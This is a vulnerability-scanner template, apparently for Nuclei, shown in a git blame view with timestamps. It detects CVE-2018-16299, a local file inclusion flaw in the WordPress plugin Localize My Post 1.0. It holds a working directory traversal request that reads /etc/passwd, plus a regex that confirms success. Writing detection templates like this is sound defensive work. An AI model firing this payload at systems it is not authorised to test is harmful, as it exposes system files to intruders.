2021-06-25 07:13:55 +00:00
|
|
|
id: CVE-2018-16299
|
2021-06-24 22:46:32 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: WordPress Plugin Localize My Post 1.0 - LFI
|
2021-07-19 12:47:12 +00:00
|
|
|
author: 0x_Akoko,0x240x23elu
|
2021-06-24 22:46:32 +00:00
|
|
|
severity: high
|
|
|
|
reference: https://www.exploit-db.com/exploits/45439
|
2021-06-25 07:15:04 +00:00
|
|
|
tags: wordpress,cve2018,cve,lfi
|
2021-06-24 22:46:32 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2021-07-24 21:35:55 +00:00
|
|
|
- "root:.*:0:0"
|
2021-06-24 22:46:32 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|